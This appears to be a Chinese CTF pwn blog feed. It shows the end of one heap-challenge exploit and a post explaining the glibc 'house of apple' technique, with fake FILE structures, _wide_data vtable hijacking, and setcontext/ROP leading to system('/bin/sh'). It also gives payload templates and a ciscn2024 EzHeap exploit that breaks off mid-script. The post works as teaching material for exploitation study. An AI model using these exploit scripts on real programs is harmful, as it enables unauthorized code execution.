class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./heap"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-attribute">libc</span>=ELF("/lib/x86_64-linux-gnu/libc.so.6")<span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">'192.168.182.137'</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 10006<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def cmd(choice):<br> ru(<span class="hljs-string">">>"</span>)<br> sl(str(choice))<br><br>def <span class="hljs-built_in">add</span>(index,size):<br> cmd(1)<br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"size? "</span>)<br> sl(str(size))<br><br>def delete(index):<br> cmd(2)<br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br><br>def show(index):<br> cmd(3)<br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,content):<br> cmd(4) <br> ru(<span class="hljs-string">"idx? "</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"content : "</span>)<br> s(content)<br><br><span class="hljs-built_in">add</span>(0,0x420)<br><span class="hljs-built_in">add</span>(1,0x18)<br><span class="hljs-built_in">add</span>(2,0x418)<br><br>delete(0)<br><span class="hljs-built_in">add</span>(3,0x460)<br>delete(2)<br><br>show(0)<br><span class="hljs-attribute">fd</span>=uu64()<br><span class="hljs-attribute">libcbase</span>=fd-0x203f10<br>lg(<span class="hljs-string">"fd"</span>)<br>lg(<span class="hljs-string">"libcbase"</span>)<br><br>one=[0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]<br><span class="hljs-attribute">onegadget</span>=libcbase+one[1]<br><span class="hljs-attribute">l_next</span>=libcbase+0x3fe890<br><span class="hljs-attribute">rtld_global</span>=libcbase+0x3fd040<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">bin_sh</span>=libcbase+next(libc.search(b'/bin/sh\x00'))<br><span class="hljs-attribute">setcontext</span>=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+61<br>_IO_list_all = libcbase + libc.sym[<span class="hljs-string">'_IO_list_all'</span>]<br><span class="hljs-attribute">ret</span>=libcbase+0x000000000002882f<br><span class="hljs-attribute">pop_rdi</span>=libcbase+0x000000000010f75b<br><span class="hljs-attribute">leave_ret</span>=libcbase+0x00000000000299d2<br><span class="hljs-attribute">swapcontext</span>=libcbase+0x000000000005814D<br><span class="hljs-attribute">svcudp_reply</span>=libcbase+0x000000000017923D<br>one=[0x583dc,0x583e3,0xef4ce,0xef52b]<br><span class="hljs-attribute">one_gadget</span>=libcbase+one[3]<br>lg(<span class="hljs-string">"l_next"</span>)<br>lg(<span class="hljs-string">"rtld_global"</span>)<br><br><span class="hljs-built_in">edit</span>(0,b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x10)<br>show(0)<br>ru(b<span class="hljs-string">'A'</span><span class="hljs-number">*0</span>x10)<br><span class="hljs-attribute">heapbase</span>=uheap()-0x290<br>lg(<span class="hljs-string">"heapbase"</span>)<br><span class="hljs-built_in">edit</span>(0,p64(fd)<span class="hljs-number">*2</span>+p64(heapbase+0x290)+p64(_IO_list_all-0x20))<br><br><span class="hljs-built_in">add</span>(4,0x490)<br><br><span class="hljs-attribute">fake_heap</span>=heapbase+0xb00+0x10<br><span class="hljs-attribute">heap1</span>=fake_heap+0x88<br>IO_wfile_jumps = libcbase + 0x202228#_IO_wfile_jumps<br><br>lg(<span class="hljs-string">"fake_heap"</span>)<br>lg(<span class="hljs-string">"heap1"</span>)<br>fake_file = b<span class="hljs-string">''</span><br>fake_file = p64(0)+p64(1)<br>fake_file= fake_file.ljust(0x28,b<span class="hljs-string">'\x00'</span>)+p64(heap1)<br>fake_file = fake_file.ljust(0x68,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0x80,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br>fake_file = fake_file.ljust(0xb8,b<span class="hljs-string">'\x00'</span>)+p64(IO_wfile_jumps)<br>payload = cyclic(0x10)+fake_file<br><span class="hljs-built_in">edit</span>(2,payload)<br><br>payload = b<span class="hljs-string">''</span><br>payload = payload.ljust(0x58,b<span class="hljs-string">'\x00'</span>)+p64(svcudp_reply)<br>payload = payload.ljust(0xa0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x120-0x28)+p64(ret)<br>payload = payload.ljust(0xc0,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)+p64(0)<span class="hljs-number">*3</span>+p64(fake_heap-0x10)+p64(0)<br>payload +=b<span class="hljs-string">'\x00'</span><span class="hljs-number">*0</span>x28+p64(fake_heap)<br>payload +=p64(swapcontext)<br>payload = payload.ljust(0x128,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap+0x130)+p64(ret)<span class="hljs-number">*2</span>+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>payload = payload.ljust(0x168,b<span class="hljs-string">'\x00'</span>)+p64(fake_heap)<br><span class="hljs-built_in">edit</span>(3,payload)<br>dbg()<br>cmd(5)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>house_of_apple</title>
<link href="/2024/05/20/house-of-apple/"/>
<url>/2024/05/20/house-of-apple/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>打ciscn的时候突然被gitee恶心到了,之前发的博客(一些笔记)都没了,导致做高版本堆题的时候找不到自己之前存的模板,人傻了,然后听其他师傅的打了house of apple,其实之前有学过,可能是太久没碰过了导致忘记了,本文重新记录一下apple的打法和大致原理</p><h1 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h1><p>1.泄露出堆地址以及libc地址</p><p>2.能控制程序执行io操作,包括但不限于:从main函数返回、调用exit函数、通过_malloc_assert触发</p><p>3.能控制_IO_FILE的vtable和_wide_data,一般用largebin attack</p><h1 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h1><p>stdin/stdout/stderr这三个_IO_FILE结构体使用的是_IO_file_jumps这个vtable,而当需要调用到vtable里面的函数指针时,会使用宏去调用。以_IO_file_overflow调用为例,glibc中调用的代码片段分析如下</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs lisp">#define _IO_OVERFLOW(<span class="hljs-name">FP</span>, CH) JUMP1 (<span class="hljs-name">__overflow</span>, FP, CH)<br> <br>#define JUMP1(<span class="hljs-name">FUNC</span>, THIS, X1) (<span class="hljs-name">_IO_JUMPS_FUNC</span>(<span class="hljs-name">THIS</span>)->FUNC) (<span class="hljs-name">THIS</span>, X1)<br> <br># define _IO_JUMPS_FUNC(<span class="hljs-name">THIS</span>) (<span class="hljs-name">IO_validate_vtable</span> (<span class="hljs-name">_IO_JUMPS_FILE_plus</span> (<span class="hljs-name">THIS</span>)))<br></code></pre></td></tr></table></figure><p>其中,<code>IO_validate_vtable</code>函数负责检查<code>vtable</code>的合法性,会判断<code>vtable</code>的地址是不是在一个合法的区间。如果<code>vtable</code>的地址不合法,程序将会异常终止。</p><p>观察<code>struct _IO_wide_data</code>结构体,发现其对应有一个<code>_wide_vtable</code>成员。</p><figure class="highlight sqf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs sqf">struct <span class="hljs-variable">_IO_wide_data</span><br>{<br> wchar_t *<span class="hljs-variable">_IO_read_ptr</span>; <span class="hljs-comment">/* Current read pointer */</span><br> wchar_t *<span class="hljs-variable">_IO_read_end</span>; <span class="hljs-comment">/* End of get area. */</span><br> wchar_t *<span class="hljs-variable">_IO_read_base</span>; <span class="hljs-comment">/* Start of putback+get area. */</span><br> wchar_t *<span class="hljs-variable">_IO_write_base</span>; <span class="hljs-comment">/* Start of put area. */</span><br> wchar_t *<span class="hljs-variable">_IO_write_ptr</span>; <span class="hljs-comment">/* Current put pointer. */</span><br> wchar_t *<span class="hljs-variable">_IO_write_end</span>; <span class="hljs-comment">/* End of put area. */</span><br> wchar_t *<span class="hljs-variable">_IO_buf_base</span>; <span class="hljs-comment">/* Start of reserve area. */</span><br> wchar_t *<span class="hljs-variable">_IO_buf_end</span>; <span class="hljs-comment">/* End of reserve area. */</span><br> <span class="hljs-comment">/* The following fields are used to support backing up and undo. */</span><br> wchar_t *<span class="hljs-variable">_IO_save_base</span>; <span class="hljs-comment">/* Pointer to start of non-current get area. */</span><br> wchar_t *<span class="hljs-variable">_IO_backup_base</span>; <span class="hljs-comment">/* Pointer to first valid character of</span><br><span class="hljs-comment"> backup area */</span><br> wchar_t *<span class="hljs-variable">_IO_save_end</span>; <span class="hljs-comment">/* Pointer to end of non-current get area. */</span><br> <br> <span class="hljs-variable">__mbstate_t</span> <span class="hljs-variable">_IO_state</span>;<br> <span class="hljs-variable">__mbstate_t</span> <span class="hljs-variable">_IO_last_state</span>;<br> struct <span class="hljs-variable">_IO_codecvt</span> <span class="hljs-variable">_codecvt</span>;<br> wchar_t <span class="hljs-variable">_shortbuf</span>[<span class="hljs-number">1</span>];<br> const struct <span class="hljs-variable">_IO_jump_t</span> *<span class="hljs-variable">_wide_vtable</span>;<br>};<br></code></pre></td></tr></table></figure><p>在调用<code>_wide_vtable</code>虚表里面的函数时,同样是使用宏去调用,仍然以<code>vtable->_overflow</code>调用为例,所用到的宏依次为:</p><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">_IO_WOVERFLOW</span>(FP, CH) WJUMP1 (__overflow, FP, CH)<br> <br><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">WJUMP1</span>(FUNC, THIS, X1) (_IO_WIDE_JUMPS_FUNC(THIS)->FUNC) (THIS, X1)<br> <br><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">_IO_WIDE_JUMPS_FUNC</span>(THIS) <span class="hljs-built_in">_IO_WIDE_JUMPS</span>(THIS)<br> <br><span class="hljs-selector-id">#define</span> <span class="hljs-built_in">_IO_WIDE_JUMPS</span>(THIS) \<br> _IO_CAST_FIELD_ACCESS ((THIS), struct _IO_FILE, _wide_data)->_wide_vtable<br></code></pre></td></tr></table></figure><p>可以看到,在调用<code>_wide_vtable</code>里面的成员函数指针时,<strong>没有关于vtable的合法性检查</strong>。</p><p>因此,我们可以劫持<code>IO_FILE</code>的<code>vtable</code>为<code>_IO_wfile_jumps</code>,控制<code>_wide_data</code>为可控的堆地址空间,进而控制<code>_wide_data->_wide_vtable</code>为可控的堆地址空间。控制程序执行<code>IO</code>流函数调用,最终调用到<code>_IO_Wxxxxx</code>函数即可控制程序的执行流。</p><h1 id="链路分析"><a href="#链路分析" class="headerlink" title="链路分析"></a>链路分析</h1><p>触发的方式和apple1是一样的 可以通过显示调用的exit 或者是从main函数返回的隐式exit 或者是malloc_assert输出报错信息</p><p>下面是通过exit触发的链</p><p>exit -> fcloseall -> _IO_cleanup -> _IO_flush_all_lockp -> _IO_OVERFLOW</p><p>主要的思想就是劫持IO_list_all为堆地址 从而我们可以伪造io结构体</p><p>这里主要注意的就是两个成员 一个是_wide_data 一个是vtable</p><p>我们先说vtable 这里的思路是将其伪造为_IO_wfile_jumps</p><p>这样触发io时会调用到_IO_wfile_overflow 来看一下这个函数主要的内容</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201617930.png" alt="image-20240520161714872"></p><p>其内部调用了wdoallocbuf函数 这个函数存在一个任意函数调用的点</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201618469.png" alt="image-20240520161825922"></p><p>其索引是通过rax寄存器来的</p><p>而此时的rax值 就是fakeio的0xa0偏移处的wide_data成员</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201620769.png" alt="image-20230716161559230"></p><p>其wide_data处要求是一个结构体指针 wdoallocbuf函数会调用该指针的vtable的overflow函数</p><p>如果我们将其控制为setcontext 就可以实现一段rop 哪怕是开启了沙盒 也是适用的</p><h1 id="伪造分析"><a href="#伪造分析" class="headerlink" title="伪造分析"></a>伪造分析</h1><p>关键的伪造点就那几个</p><p>1.先要把_IO_list_all利用largebin attack先覆盖成可控地址 用来伪造结构体 下面称fakeio1</p><p>2.控制fakeio1的vtable为_IO_wfile_jumps 从而调用到 _IO_wfile_overflow</p><p>3.控制fakeio1的_wide_date为fakeio2</p><p>4.控制fakeio2的vtable为fakeio3</p><p>5.控制fakeio3的偏移0x68处为setcontext</p><p>需要注意的就是最后的rop链存放的位置不能影响到fakeio的其他成员 导致程序执行流无法顺利执行</p><p>还有就是之所以 不直接更改_wide_data->vtable->0x68为system函数 然后设置fakeio首地址处为/bin/sh 这样破坏了flag成员 无法让程序执行流按预期的执行</p><p>剩下的就参考下面的模板吧</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs stylus">fakeio1<br><br><br>IO_wfile_jumps = libc_addr + <span class="hljs-number">0</span>x2160c0<br>fake_file = b<span class="hljs-string">''</span><br>fake_file = fake_file<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>x20,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)<br>fake_file = fake_file<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xa0,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(chunk5_addr)<br>fake_file = fake_file<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xd8,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(IO_wfile_jumps)<br>payload = <span class="hljs-built_in">cyclic</span>(<span class="hljs-number">0</span>x10)+fake_file<br></code></pre></td></tr></table></figure><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs stylus">fakeio2<br><br><br>payload = b<span class="hljs-string">''</span><br>payload = payload<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>x58,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(setcontext)<br>payload = payload<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>x90,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(chunk5_addr+<span class="hljs-number">0</span>xf0)+<span class="hljs-built_in">p64</span>(ret_addr)<br>payload = payload<span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xd0,b<span class="hljs-string">'\x00'</span>)+<span class="hljs-built_in">p64</span>(chunk5_addr)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(rdi_addr)+<span class="hljs-built_in">p64</span>(binsh_addr)+<span class="hljs-built_in">p64</span>(system_addr)<br></code></pre></td></tr></table></figure><h1 id="例题-ciscn2024-EzHeap"><a href="#例题-ciscn2024-EzHeap" class="headerlink" title="例题:ciscn2024-EzHeap"></a>例题:ciscn2024-EzHeap</h1><p>一道常规的堆题,开了沙箱</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201634167.png" alt="image-20240520163411114"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201637122.png" alt="image-20240520163724047"></p><p>漏洞点在edit,有明显的堆溢出<img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202405201637746.png" alt="image-20240520163753696"></p><p>先构造出largebin,然后泄露出libc地址和堆地址,然后就是套上面的板子打apple就行了(但是好像直接打orw打不通,用syscall就行了)</p><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">from</span> pwn import *<br><span class="hljs-attribute">from</span> ctypes import *<br><span class="hljs-attribute">from</span> struct import pack<br><span class="hljs-attribute">banary</span> = <span class="hljs-string">"./EzHeap"</span><br><span class="hljs-attribute">elf</span> = ELF(banary)<br><span class="hljs-attribute">libc</span> = ELF(<span class="hljs-string">"./libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><br><span class="hljs-attribute">ip</span> = ''<br><span class="hljs-attribute">port</span> = <span class="hljs-number">0</span><br><span class="hljs-attribute">local</span> = <span class="hljs-number">1</span><br><span class="hljs-attribute">if</span> local:<br> <span class="hljs-attribute">io</span> = process(banary)<br><span class="hljs-attribute">else</span>:<br> <span class="hljs-attribute">io</span> = remote(ip, port)<br><br><span class="hljs-attribute">context</span>(log_level = 'debug', os = 'linux', arch = 'amd64')<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-attribute">def</span> dbg():<br> <span class="hljs-attribute">gdb</span>.attach(io)<br> <span class="hljs-attribute">pause</span>()<br><br><span class="hljs-attribute">s</span> = lambda data : io.send(data)<br><span class="hljs-attribute">sl</span> = lambda data : io.sendline(data)<br><span class="hljs-attribute">sa</span> = lambda text, data : io.sendafter(text, data)<br><span class="hljs-attribute">sla</span> = lambda text, data : io.sendlineafter(text, data)<br><span class="hljs-attribute">r</span> = lambda : io.recv()<br><span class="hljs-attribute">ru</span> = lambda text : io.recvuntil(text)<br><span class="hljs-attribute">uu32</span> = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, b'\x00'))<br><span class="hljs-attribute">uu64</span> = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, b<span class="hljs-string">"\x00"</span>))<br><span class="hljs-attribute">iuu32</span> = lambda : int(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">iuu64</span> = lambda : int(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br><span class="hljs-attribute">uheap</span> = lambda : u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,b'\x00'))<br><span class="hljs-attribute">lg</span> = lambda data : io.success('%s -> <span class="hljs-number">0</span>x%x' % (data, eval(data)))<br><span class="hljs-attribute">ia</span> = lambda : io.interactive()<br><br><span class="hljs-attribute">def</span> cmd(choice):<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"choice >> "</span>)<br> <span class="hljs-attribute">sl</span>(str(choice))<br><br><span class="hljs-attribute">def</span> add(size,content):<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">1</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"size:"</span>)<br> <span class="hljs-attribute">sl</span>(str(size))<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"content:"</span>)<br> <span class="hljs-attribute">s</span>(content)<br><br><span class="hljs-attribute">def</span> delete(index):<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">2</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"idx:"</span>)<br> <span class="hljs-attribute">sl</span>(str(index))<br><br><span class="hljs-attribute">def</span> edit(index,content):<br> <span class="hljs-attribute">size</span>=len(content)<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">3</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"idx:"</span>)<br> <span class="hljs-attribute">sl</span>(str(index))<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"size:"</span>)<br> <span class="hljs-attribute">sl</span>(str(size))<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"content:"</span>)<br> <span class="hljs-attribute">s</span>(content)<br><br><span class="hljs-attribute">def</span> show(index):<br> <span class="hljs-attribute">cmd</span>(<span class="hljs-number">4</span>)<br> <span class="hljs-attribute">ru</span>(<span class="hljs-string">"idx:"</span>)<br> <span class="hljs-attribute">sl</span>(str(index))<br><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x200,b'/bin/sh\x00')#<span class="hljs-number">0</span><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x468,b'youlin')#<span class="hljs-number">1</span><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x228,b'youlin')#<span class="hljs-number">2</span><br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x430,b'youlin')#<span class="hljs-number">3</span><br><br><span class="hljs-attribute">delete</span>(<span class="hljs-number">1</span>)<br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x470,b'sbgitee0')#<span class="hljs-number">1</span><br><span class="hljs-attribute">edit</span>(<span class="hljs-number">0</span>,b'A'*<span class="hljs-number">0</span>x200+b'B'*<span class="hljs-number">0</span>x10)#p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>x471)<br><span class="hljs-attribute">show</span>(<span class="hljs-number">0</span>)<br><span class="hljs-attribute">fd</span>=uu64()<br><span class="hljs-attribute">libcbase</span>=fd-<span class="hljs-number">0</span>x21b0e0<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"fd"</span>)<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">_IO_list_all</span> = libcbase + libc.sym['_IO_list_all']<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"_IO_list_all"</span>)<br><br><span class="hljs-attribute">edit</span>(<span class="hljs-number">0</span>,b'A'*<span class="hljs-number">0</span>x200+b'A'*<span class="hljs-number">0</span>x10+b'B'*<span class="hljs-number">0</span>x10)<br><span class="hljs-attribute">show</span>(<span class="hljs-number">0</span>)<br><span class="hljs-attribute">ru</span>(<span class="hljs-string">"B"</span>*<span class="hljs-number">0</span>x10)<br><span class="hljs-attribute">heapbase</span>=uheap()-<span class="hljs-number">0</span>x2510<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-attribute">edit</span>(<span class="hljs-number">0</span>,b'A'*<span class="hljs-number">0</span>x200+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">0</span>x471)+p64(fd)*<span class="hljs-number">2</span>+p64(heapbase+<span class="hljs-number">0</span>x2510)+p64(_IO_list_all-<span class="hljs-number">0</span>x20))<br><span class="hljs-attribute">delete</span>(<span class="hljs-number">3</span>)<br><span class="hljs-attribute">add</span>(<span class="hljs-number">0</span>x480,b'sbgitee')#<span class="hljs-number">3</span><br><br><span class="hljs-attribute">fake_heap</span>=heapbase+<span class="hljs-number">0</span>x2990+<span class="hljs-number">0</span>x10<br><span class="hljs-attribute">lg</span>(<span class="hljs-string">"fake_heap"</span>)<br><span class="hljs-attribute">IO_wfile_jumps</span> = libcbase + <span class="hljs-number">0</span>x2170c0<br><span class="hljs-attribute">fake_file</span> = b''<br><span class="hljs-attribute">fake_file</span> = fake_file.ljust(<span class="hljs-number">0</span>x20,b'\x00')+p64(<span class="hljs-number">0</span>)+p64(<span class="hljs-number">1</span>)<br><span class="hljs-attribute">fake_file</span> = fake_file.ljust(<span class="hljs-number">0</span>xa0,b'\x00')+p64(fake_heap)<br><span class="hljs-attribute">fake_file</span> = fake_file.ljust(<span class="hljs-number">0</span>xd8,b'\x00')+p64(IO_wfile_jumps)<br><span class="hljs-attribute">payload</span> = cyclic(<span class="hljs-number">0</span>x10)+fake_file<br><span class="hljs-attribute">edit</span>(<span class="hljs-number">2</span>,cyclic(<span class="hljs-number">0</span>x210)+payload)<br><br><span class="hljs-attribute">flag_addr</span> = fake_heap-<span class="hljs-number">0</span>x10<br><span class="hljs-attribute">setcontext</span> = libcbase + libc.sym['setcontext']+<span class="hljs-number">61</span><br><span class="hljs-attribute">ret_addr</span> = libcbase + <span class="hljs-number">0</span>x0000000000029139<br><span class="hljs-attribute">rdi_addr</span> = libcbase + <span class="hljs-number">0</span>x000000000002a3e5<br><span class="hljs-attribute">rsi_addr</span> = libcbase + <span class="hljs-number">0</span>x000000000002be51<br><span class="hljs-attribute">rdx_r12_addr</span> = libcbase + <span 